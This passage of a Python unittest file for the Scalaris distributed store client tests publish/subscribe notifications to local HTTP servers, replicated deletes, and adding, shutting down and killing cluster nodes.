msg = "Subscribers of topic (" + topic1 + ") should only be [" + _TEST_DATA[i] + "], but is: " + repr(subscribers))
conn.close_connection()
# Test method for PubSub.subscribe(topic, url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a single topic for all URLs.
def testSubscribe2(self):
topic = "_Subscribe2"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[i])
# check if the subscribers were successfully saved:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
for i in xrange(len(_TEST_DATA)):
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic + "\"")
self.assertEqual(self._getDiffElement(subscribers, _TEST_DATA), None,
msg = "unexpected subscriber of topic \"" + topic + "\"")
conn.close_connection()
# Test method for PubSub.unsubscribe(topic, url) with a closed connection.
def testUnsubscribe_NotConnected(self):
topic = "_Unsubscribe_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[0])
self.assertRaises(scalaris.NotFoundError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[0])
conn.close_connection()
# Test method for PubSub.unsubscribe(topic, url) and PubSub.get_subscribers(topic).
# Tries to unsubscribe a URL from a non-existing topic and tries to get the subscriber list afterwards.
def testUnsubscribe_NotExistingTopic(self):
topic = "_Unsubscribe_NotExistingTopic"
conn = PubSub()
# unsubscribe test "url":
self.assertRaises(scalaris.NotFoundError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[0])
# check whether the unsubscribed urls were unsubscribed:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
self.assertFalse(_TEST_DATA[0] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[0] + "\" should have been unsubscribed from topic \"" + topic + "\"")
self.assertEqual(len(subscribers), 0,
msg = "Subscribers of topic (" + topic + ") should only be [], but is: " + repr(subscribers))
conn.close_connection()
# Test method for PubSub.subscribe(topic, url), PubSub.unsubscribe(topic, url) and PubSub.get_subscribers(topic).
# Tries to unsubscribe an unsubscribed URL from an existing topic and compares the subscriber list afterwards.
def testUnsubscribe_NotExistingUrl(self):
topic = "_Unsubscribe_NotExistingUrl"
conn = PubSub()
# first subscribe test "urls"...
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[0])
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[1])
# then unsubscribe another "url":
self.assertRaises(scalaris.NotFoundError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[2])
# check whether the subscribers were successfully saved:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
self.assertTrue(_TEST_DATA[0] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[0] + "\" does not exist for topic \"" + topic + "\"")
self.assertTrue(_TEST_DATA[1] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[1] + "\" does not exist for topic \"" + topic + "\"")
# check whether the unsubscribed urls were unsubscribed:
self.assertFalse(_TEST_DATA[2] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[2] + "\" should have been unsubscribed from topic \"" + topic + "\"")
self.assertEqual(len(subscribers), 2,
msg = "Subscribers of topic (" + topic + ") should only be [\"" + _TEST_DATA[0] + "\", \"" + _TEST_DATA[1] + "\"], but is: " + repr(subscribers))
conn.close_connection()
    # Test method for PubSub.subscribe(topic, url), PubSub.unsubscribe(topic, url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a distinct topic for each URL.
# Unsubscribes every second subscribed URL.
def testUnsubscribe1(self):
topic = "_UnsubscribeString1_"
conn = PubSub()
# first subscribe test "urls"...
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic + str(i), _TEST_DATA[i])
# ... then unsubscribe every second url:
for i in xrange(0, len(_TEST_DATA), 2):
conn.unsubscribe(str(self._testTime) + topic + str(i), _TEST_DATA[i])
# check whether the subscribers were successfully saved:
for i in xrange(1, len(_TEST_DATA), 2):
topic1 = topic + str(i)
subscribers = conn.get_subscribers(str(self._testTime) + topic1)
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic1 + "\"")
self.assertEqual(len(subscribers), 1,
msg = "Subscribers of topic (" + topic1 + ") should only be [\"" + _TEST_DATA[i] + "\"], but is: " + repr(subscribers))
# check whether the unsubscribed urls were unsubscribed:
for i in xrange(0, len(_TEST_DATA), 2):
topic1 = topic + str(i)
subscribers = conn.get_subscribers(str(self._testTime) + topic1)
self.assertFalse(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" should have been unsubscribed from topic \"" + topic1 + "\"")
self.assertEqual(len(subscribers), 0,
msg = "Subscribers of topic (" + topic1 + ") should only be [], but is: " + repr(subscribers))
conn.close_connection()
    # Test method for PubSub.subscribe(topic, url), PubSub.unsubscribe(topic, url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a single topic for all URLs.
# Unsubscribes every second subscribed URL.
def testUnsubscribe2(self):
        topic = "_UnsubscribeString2"
conn = PubSub()
# first subscribe all test "urls"...
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[i])
# ... then unsubscribe every second url:
for i in xrange(0, len(_TEST_DATA), 2):
conn.unsubscribe(str(self._testTime) + topic, _TEST_DATA[i])
# check whether the subscribers were successfully saved:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
subscribers_expected = []
for i in xrange(1, len(_TEST_DATA), 2):
subscribers_expected.append(_TEST_DATA[i])
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic + "\"")
# check whether the unsubscribed urls were unsubscribed:
for i in xrange(0, len(_TEST_DATA), 2):
self.assertFalse(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" should have been unsubscribed from topic \"" + topic + "\"")
self.assertEqual(self._getDiffElement(subscribers, subscribers_expected), None,
msg = "unexpected subscriber of topic \"" + topic + "\"")
conn.close_connection()
def _checkNotifications(self, notifications, expected):
not_received = []
unrelated_items = []
unrelated_topics = []
for (topic, contents) in expected.items():
if topic not in notifications:
notifications[topic] = []
for content in contents:
if not content in notifications[topic]:
not_received.append(topic + ": " + content)
notifications[topic].remove(content)
if len(notifications[topic]) > 0:
unrelated_items.append("(" + topic + ": " + ", ".join(notifications[topic]) + ")")
del notifications[topic]
# is there another (unexpected) topic we received content for?
if len(notifications) > 0:
for (topic, contents) in notifications.items():
if len(contents) > 0:
unrelated_topics.append("(" + topic + ": " + ", ".join(contents) + ")")
break
fail_msg = "not received: " + ", ".join(not_received) + "\n" +\
"unrelated items: " + ", ".join(unrelated_items) + "\n" +\
"unrelated topics: " + ", ".join(unrelated_topics)
self.assertTrue(len(not_received) == 0 and len(unrelated_items) == 0
and len(unrelated_topics) == 0, fail_msg)
# Test method for the publish/subscribe system.
    # Single server, subscription to one topic, multiple publishes.
def testSubscription1(self):
topic = str(self._testTime) + "_Subscription1"
conn = PubSub()
server1 = self._newSubscriptionServer()
notifications_server1_expected = {topic: []}
ip1, port1 = server1.server_address
conn.subscribe(topic, 'http://' + str(ip1) + ':' + str(port1))
for i in xrange(len(_TEST_DATA)):
conn.publish(topic, _TEST_DATA[i])
notifications_server1_expected[topic].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if topic not in server1.notifications or len(server1.notifications[topic]) < len(notifications_server1_expected[topic]):
time.sleep(1)
else:
break
server1.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
conn.close_connection()
# Test method for the publish/subscribe system.
    # Three servers, subscription to one topic, multiple publishes.
def testSubscription2(self):
topic = str(self._testTime) + "_Subscription2"
conn = PubSub()
server1 = self._newSubscriptionServer()
server2 = self._newSubscriptionServer()
server3 = self._newSubscriptionServer()
notifications_server1_expected = {topic: []}
notifications_server2_expected = {topic: []}
notifications_server3_expected = {topic: []}
ip1, port1 = server1.server_address
ip2, port2 = server2.server_address
ip3, port3 = server3.server_address
conn.subscribe(topic, 'http://' + str(ip1) + ':' + str(port1))
conn.subscribe(topic, 'http://' + str(ip2) + ':' + str(port2))
conn.subscribe(topic, 'http://' + str(ip3) + ':' + str(port3))
for i in xrange(len(_TEST_DATA)):
conn.publish(topic, _TEST_DATA[i])
notifications_server1_expected[topic].append(_TEST_DATA[i])
notifications_server2_expected[topic].append(_TEST_DATA[i])
notifications_server3_expected[topic].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if (topic not in server1.notifications or len(server1.notifications[topic]) < len(notifications_server1_expected[topic])) or \
(topic not in server2.notifications or len(server2.notifications[topic]) < len(notifications_server2_expected[topic])) or \
(topic not in server3.notifications or len(server3.notifications[topic]) < len(notifications_server3_expected[topic])):
time.sleep(1)
else:
break
server1.shutdown()
server2.shutdown()
server3.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
self._checkNotifications(server2.notifications, notifications_server2_expected)
self._checkNotifications(server3.notifications, notifications_server3_expected)
conn.close_connection()
# Test method for the publish/subscribe system.
    # Three servers, subscriptions to different topics, multiple publishes; each
    # server receives a different number of elements.
def testSubscription3(self):
topic1 = str(self._testTime) + "_Subscription3_1"
topic2 = str(self._testTime) + "_Subscription3_2"
topic3 = str(self._testTime) + "_Subscription3_3"
conn = PubSub()
server1 = self._newSubscriptionServer()
server2 = self._newSubscriptionServer()
server3 = self._newSubscriptionServer()
notifications_server1_expected = {topic1: []}
notifications_server2_expected = {topic2: []}
notifications_server3_expected = {topic3: []}
ip1, port1 = server1.server_address
ip2, port2 = server2.server_address
ip3, port3 = server3.server_address
conn.subscribe(topic1, 'http://' + str(ip1) + ':' + str(port1))
conn.subscribe(topic2, 'http://' + str(ip2) + ':' + str(port2))
conn.subscribe(topic3, 'http://' + str(ip3) + ':' + str(port3))
for i in xrange(0, len(_TEST_DATA), 2):
conn.publish(topic1, _TEST_DATA[i])
notifications_server1_expected[topic1].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 3):
conn.publish(topic2, _TEST_DATA[i])
notifications_server2_expected[topic2].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 5):
conn.publish(topic3, _TEST_DATA[i])
notifications_server3_expected[topic3].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if (topic1 not in server1.notifications or len(server1.notifications[topic1]) < len(notifications_server1_expected[topic1])) or \
(topic2 not in server2.notifications or len(server2.notifications[topic2]) < len(notifications_server2_expected[topic2])) or \
(topic3 not in server3.notifications or len(server3.notifications[topic3]) < len(notifications_server3_expected[topic3])):
time.sleep(1)
else:
break
server1.shutdown()
server2.shutdown()
server3.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
self._checkNotifications(server2.notifications, notifications_server2_expected)
self._checkNotifications(server3.notifications, notifications_server3_expected)
conn.close_connection()
# Test method for the publish/subscribe system.
# Like testSubscription3() but some subscribed urls will be unsubscribed.
def testSubscription4(self):
topic1 = str(self._testTime) + "_Subscription4_1"
topic2 = str(self._testTime) + "_Subscription4_2"
topic3 = str(self._testTime) + "_Subscription4_3"
conn = PubSub()
server1 = self._newSubscriptionServer()
server2 = self._newSubscriptionServer()
server3 = self._newSubscriptionServer()
notifications_server1_expected = {topic1: []}
notifications_server2_expected = {topic2: []}
notifications_server3_expected = {topic3: []}
ip1, port1 = server1.server_address
ip2, port2 = server2.server_address
ip3, port3 = server3.server_address
conn.subscribe(topic1, 'http://' + str(ip1) + ':' + str(port1))
conn.subscribe(topic2, 'http://' + str(ip2) + ':' + str(port2))
conn.subscribe(topic3, 'http://' + str(ip3) + ':' + str(port3))
conn.unsubscribe(topic2, 'http://' + str(ip2) + ':' + str(port2))
for i in xrange(0, len(_TEST_DATA), 2):
conn.publish(topic1, _TEST_DATA[i])
notifications_server1_expected[topic1].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 3):
conn.publish(topic2, _TEST_DATA[i])
# note: topic2 is unsubscribed
# notifications_server2_expected[topic2].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 5):
conn.publish(topic3, _TEST_DATA[i])
notifications_server3_expected[topic3].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if (topic1 not in server1.notifications or len(server1.notifications[topic1]) < len(notifications_server1_expected[topic1])) or \
(topic3 not in server3.notifications or len(server3.notifications[topic3]) < len(notifications_server3_expected[topic3])):
time.sleep(1)
else:
break
server1.shutdown()
server2.shutdown()
server3.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
self._checkNotifications(server2.notifications, notifications_server2_expected)
self._checkNotifications(server3.notifications, notifications_server3_expected)
conn.close_connection()
@staticmethod
def _newSubscriptionServer(server_address = ('localhost', 0)):
server = TestPubSub.SubscriptionServer(server_address)
#ip, port = server.server_address
# Start a thread with the server
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.setDaemon(True)
server_thread.start()
#print "Server loop running in thread:", server_thread.getName()
server.waitForStart()
return server
class SubscriptionServer(HTTPServer):
def __init__(self, server_address):
HTTPServer.__init__(self, server_address, TestPubSub.SubscriptionHandler)
self.notifications = {}
def checkPortOccupied(self):
"""Checks if the chosen port is in use."""
if (self.server_port == 0):
return False
# try to connect to the http server's socket to test whether it is up
for (family, socktype, proto, _canonname, _sockaddr) in \
socket.getaddrinfo(self.server_name, self.server_port, 0, socket.SOCK_STREAM):
s = None
try:
s = socket.socket(family, socktype, proto)
s.settimeout(1.0)
s.connect((self.server_name, self.server_port))
s.close()
return True
except:
if s:
s.close()
return False
def waitForStart(self):
# wait until port is occupied:
for _i in xrange(10): # 1s timeout in socket connect + 0.1 here => 11s total timeout
if self.checkPortOccupied():
return
else:
time.sleep(.1)
msg = "Port %s not bound on %s" % (repr(self.server_port), repr(self.server_name))
raise IOError(msg)
class SubscriptionHandler(BaseHTTPRequestHandler):
def do_POST(self):
if 'content-length' in self.headers and 'content-type' in self.headers:
length = int(self.headers['content-length'])
charset = self.headers['content-type'].split('charset=')
if (len(charset) > 1):
encoding = charset[-1]
else:
encoding = 'utf-8'
data = self.rfile.read(length).decode(encoding)
response_json = json.loads(data)
# {"method":"notify","params":["1209386211287_SubscribeTest","content"],"id":482975}
if 'method' in response_json and response_json['method'] == 'notify' \
and 'params' in response_json and 'id' in response_json \
and isinstance(response_json['params'], list) and len(response_json['params']) == 2:
topic = response_json['params'][0]
content = response_json['params'][1]
if hasattr(self.server, 'notifications'):
if topic not in self.server.notifications:
self.server.notifications[topic] = []
self.server.notifications[topic].append(content)
else:
pass
response = '{}'.encode('utf-8')
self.send_response(200)
self.send_header("Content-type", "text/html; charset=utf-8")
self.send_header("Content-length", str(len(response)))
self.end_headers()
self.wfile.write(response)
# to disable logging
def log_message(self, *args):
pass
    # Test method for PubSub.publish(topic, content) with a
    # request that is too large.
def testReqTooLarge(self):
conn = PubSub()
data = ''.join('0' for _x in xrange(_TOO_LARGE_REQUEST_SIZE))
key = "_ReqTooLarge"
try:
conn.publish(str(self._testTime) + key, data)
self.fail('The publish should have failed unless yaws_max_post_data was set larger than ' + str(_TOO_LARGE_REQUEST_SIZE))
except scalaris.ConnectionError:
pass
conn.close_connection()
class TestReplicatedDHT(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for ReplicatedDHT()
def testReplicatedDHT1(self):
rdht = ReplicatedDHT()
rdht.close_connection()
# Test method for ReplicatedDHT(conn)
def testReplicatedDHT2(self):
rdht = ReplicatedDHT(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
rdht.close_connection()
# Test method for ReplicatedDHT.close_connection() trying to close the connection twice.
def testDoubleClose(self):
rdht = ReplicatedDHT()
rdht.close_connection()
rdht.close_connection()
# Tries to read the value at the given key and fails if this does
# not fail with a NotFoundError.
def _checkKeyDoesNotExist(self, key):
conn = scalaris.TransactionSingleOp()
try:
conn.read(key)
self.fail('the value at ' + key + ' should not exist anymore')
except scalaris.NotFoundError:
# nothing to do here
pass
conn.close_connection()
# Test method for ReplicatedDHT.delete(key).
# Tries to delete some not existing keys.
def testDelete_notExistingKey(self):
key = "_Delete_NotExistingKey"
rdht = ReplicatedDHT()
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 0)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (0, 0, 4))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
rdht.close_connection()
# Test method for ReplicatedDHT.delete(key) and TransactionSingleOp#write(key, value=str()).
# Inserts some values, tries to delete them afterwards and tries the delete again.
def testDelete1(self):
key = "_Delete1"
c = scalaris.JSONConnection(url = scalaris.DEFAULT_URL)
rdht = ReplicatedDHT(conn = c)
sc = scalaris.TransactionSingleOp(conn = c)
for i in xrange(len(_TEST_DATA)):
sc.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to delete the data:
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 4)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (4, 0, 0))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
# try again (should be successful with 0 deletes)
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 0)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (0, 0, 4))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
c.close()
# Test method for ReplicatedDHT.delete(key) and TransactionSingleOp#write(key, value=str()).
# Inserts some values, tries to delete them afterwards, inserts them again and tries to delete them again (twice).
def testDelete2(self):
key = "_Delete2"
c = scalaris.JSONConnection(url = scalaris.DEFAULT_URL)
rdht = ReplicatedDHT(conn = c)
sc = scalaris.TransactionSingleOp(conn = c)
for i in xrange(len(_TEST_DATA)):
sc.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to delete the data:
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 4)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (4, 0, 0))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
for i in xrange(len(_TEST_DATA)):
sc.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to delete the data:
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 4)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (4, 0, 0))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
# try again (should be successful with 0 deletes)
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 0)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (0, 0, 4))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
c.close()
class TestScalarisVM(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for ScalarisVM()
def testScalarisVM1(self):
rdht = ScalarisVM()
rdht.close_connection()
# Test method for ScalarisVM(conn)
def testScalarisVM2(self):
rdht = ScalarisVM(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
rdht.close_connection()
# Test method for ScalarisVM.close_connection() trying to close the connection twice.
def testDoubleClose(self):
rdht = ScalarisVM()
rdht.close_connection()
rdht.close_connection()
def testGetVersion_NotConnected(self):
"""Test method for ScalarisVM.getVersion() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getVersion())
vm.getVersion()
vm.close_connection()
def testGetVersion1(self):
"""Test method for ScalarisVM.getVersion()."""
vm = ScalarisVM()
version = vm.getVersion()
self.assertTrue(isinstance(version, basestring), msg = version)
self.assertTrue(len(version) > 0)
vm.close_connection()
def testGetInfo_NotConnected(self):
"""Test method for ScalarisVM.getInfo() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getInfo())
vm.getInfo()
vm.close_connection()
def testGetInfo1(self):
"""Test method for ScalarisVM.getInfo()."""
vm = ScalarisVM()
info = vm.getInfo()
self.assertTrue(isinstance(info.scalarisVersion, basestring), msg = info.scalarisVersion)
self.assertTrue(len(info.scalarisVersion) > 0, msg = "scalaris_version (" + info.scalarisVersion + ") != \"\"");
self.assertTrue(isinstance(info.erlangVersion, basestring), msg = info.erlangVersion)
self.assertTrue(len(info.erlangVersion) > 0, msg = "erlang_version (" + info.erlangVersion + ") != \"\"");
self.assertTrue(isinstance(info.memTotal, int), msg = info.memTotal)
self.assertTrue(info.memTotal >= 0, msg = "mem_total (" + str(info.memTotal) + ") >= 0");
self.assertTrue(isinstance(info.uptime, int), msg = info.uptime)
self.assertTrue(info.uptime >= 0, msg = "uptime (" + str(info.uptime) + ") >= 0");
self.assertTrue(isinstance(info.erlangNode, basestring), msg = info.erlangNode)
self.assertTrue(len(info.erlangNode) > 0, msg = "erlang_node (" + info.erlangNode + ") != \"\"");
self.assertTrue(isinstance(info.port, int), msg = info.port)
self.assertTrue(info.port >= 0 and info.port <= 65535, msg = "0 <= port (" + str(info.port) + ") <= 65535");
self.assertTrue(isinstance(info.yawsPort, int), msg = info.yawsPort)
self.assertTrue(info.yawsPort >= 0 and info.yawsPort <= 65535, msg = "0 <= yaws_port (" + str(info.yawsPort) + ") <= 65535");
vm.close_connection()
def testGetNumberOfNodes_NotConnected(self):
"""Test method for ScalarisVM.getNumberOfNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getNumberOfNodes())
vm.getNumberOfNodes()
vm.close_connection()
    def testGetNumberOfNodes1(self):
        """Test method for ScalarisVM.getNumberOfNodes()."""
vm = ScalarisVM()
number = vm.getNumberOfNodes()
self.assertTrue(isinstance(number, int), msg = number)
self.assertTrue(number >= 0)
vm.close_connection()
def testGetNodes_NotConnected(self):
"""Test method for ScalarisVM.getNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getNodes())
vm.getNodes()
vm.close_connection()
def testGetNodes1(self):
"""Test method for ScalarisVM.getNodes()."""
vm = ScalarisVM()
nodes = vm.getNodes()
self.assertTrue(isinstance(nodes, list), msg = nodes)
self.assertTrue(len(nodes) >= 0)
self.assertEqual(len(nodes), vm.getNumberOfNodes())
vm.close_connection()
def testAddNodes_NotConnected(self):
"""Test method for ScalarisVM.addNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.addNodes(0))
vm.addNodes(0)
vm.close_connection()
def testAddNodes0(self):
"""Test method for ScalarisVM.addNodes(0)."""
self._testAddNodes(0)
def testAddNodes1(self):
"""Test method for ScalarisVM.addNodes(1)."""
self._testAddNodes(1)
def testAddNodes3(self):
"""Test method for ScalarisVM.addNodes(3)."""
self._testAddNodes(3)
def _testAddNodes(self, nodesToAdd):
"""Test method for ScalarisVM.addNodes(nodesToAdd)."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
(ok, failed) = vm.addNodes(nodesToAdd)
size = size + nodesToAdd
self.assertEqual(nodesToAdd, len(ok))
self.assertEqual(len(failed), 0)
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
for name in ok:
self.assertTrue(name in nodes, str(nodes) + " should contain " + name)
for name in ok:
vm.killNode(name)
size = size - nodesToAdd
self.assertEqual(size, vm.getNumberOfNodes())
vm.close_connection()
def testShutdownNode_NotConnected(self):
"""Test method for ScalarisVM.shutdownNode() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownNode("test"))
vm.shutdownNode("test")
vm.close_connection()
def testShutdownNode1(self):
"""Test method for ScalarisVM.shutdownNode()."""
self._testDeleteNode('shutdown')
def testKillNode_NotConnected(self):
"""Test method for ScalarisVM.killNode() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killNode("test"))
vm.killNode("test")
vm.close_connection()
def testKillNode1(self):
"""Test method for ScalarisVM.killNode()."""
self._testDeleteNode('kill')
def _testDeleteNode(self, action):
"""Test method for ScalarisVM.shutdownNode() and ScalarisVM.killNode()."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
(ok, _failed) = vm.addNodes(1)
name = ok[0]
self.assertEqual(size + 1, vm.getNumberOfNodes())
if action == 'shutdown':
result = vm.shutdownNode(name)
elif action == 'kill':
result = vm.killNode(name)
self.assertTrue(result)
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
self.assertTrue(not name in nodes, str(nodes) + " should not contain " + name)
vm.close_connection()
def testShutdownNodes_NotConnected(self):
"""Test method for ScalarisVM.shutdownNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownNodes(0))
vm.shutdownNodes(0)
vm.close_connection()
def testShutdownNodes0(self):
"""Test method for ScalarisVM.shutdownNodes(0)."""
self._testDeleteNodes(0, 'shutdown')
def testShutdownNodes1(self):
"""Test method for ScalarisVM.shutdownNodes(1)."""
self._testDeleteNodes(1, 'shutdown')
def testShutdownNodes3(self):
"""Test method for ScalarisVM.shutdownNodes(3)."""
self._testDeleteNodes(3, 'shutdown')
def testKillNodes_NotConnected(self):
"""Test method for ScalarisVM.killNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killNodes(0))
vm.killNodes(0)
vm.close_connection()
def testKillNodes0(self):
"""Test method for ScalarisVM.killNodes(0)."""
self._testDeleteNodes(0, 'kill')
def testKillNodes1(self):
"""Test method for ScalarisVM.killNodes(1)."""
self._testDeleteNodes(1, 'kill')
def testKillNodes3(self):
"""Test method for ScalarisVM.killNodes(3)."""
self._testDeleteNodes(3, 'kill')
    def _testDeleteNodes(self, nodesToRemove, action):
        """Test method for ScalarisVM.shutdownNodes() and ScalarisVM.killNodes()."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
if nodesToRemove >= 1:
vm.addNodes(nodesToRemove)
self.assertEqual(size + nodesToRemove, vm.getNumberOfNodes())
if action == 'shutdown':
result = vm.shutdownNodes(nodesToRemove)
elif action == 'kill':
result = vm.killNodes(nodesToRemove)
self.assertEqual(nodesToRemove, len(result))
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
for name in result:
self.assertTrue(not name in nodes, str(nodes) + " should not contain " + name)
vm.close_connection()
def testShutdownNodesByName_NotConnected(self):
"""Test method for ScalarisVM.shutdownNodesByName() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownNodesByName(["test"]))
vm.shutdownNodesByName(["test"])
vm.close_connection()
    def testShutdownNodesByName0(self):
        """Test method for ScalarisVM.shutdownNodesByName() with 0 nodes."""
        self._testDeleteNodesByName(0, 'shutdown')
    def testShutdownNodesByName1(self):
        """Test method for ScalarisVM.shutdownNodesByName() with 1 node."""
        self._testDeleteNodesByName(1, 'shutdown')
    def testShutdownNodesByName3(self):
        """Test method for ScalarisVM.shutdownNodesByName() with 3 nodes."""
        self._testDeleteNodesByName(3, 'shutdown')
def testKillNodesByName_NotConnected(self):
"""Test method for ScalarisVM.killNodesByName() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killNodesByName(["test"]))
vm.killNodesByName(["test"])
vm.close_connection()
    def testKillNodesByName0(self):
        """Test method for ScalarisVM.killNodesByName() with 0 nodes."""
        self._testDeleteNodesByName(0, 'kill')
    def testKillNodesByName1(self):
        """Test method for ScalarisVM.killNodesByName() with 1 node."""
        self._testDeleteNodesByName(1, 'kill')
    def testKillNodesByName3(self):
        """Test method for ScalarisVM.killNodesByName() with 3 nodes."""
        self._testDeleteNodesByName(3, 'kill')
    def _testDeleteNodesByName(self, nodesToRemove, action):
        """Test method for ScalarisVM.shutdownNodesByName() and ScalarisVM.killNodesByName()."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
if nodesToRemove >= 1:
vm.addNodes(nodesToRemove)
self.assertEqual(size + nodesToRemove, vm.getNumberOfNodes())
nodes = vm.getNodes()
shuffle(nodes)
removedNodes = nodes[:nodesToRemove]
if action == 'shutdown':
(ok, not_found) = vm.shutdownNodesByName(removedNodes)
elif action == 'kill':
(ok, not_found) = vm.killNodesByName(removedNodes)
self.assertEqual(nodesToRemove, len(ok))
        self.assertEqual(0, len(not_found))  # all removed nodes were known by name
list.sort(removedNodes)
list.sort(ok)
self.assertEqual(removedNodes, ok)
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
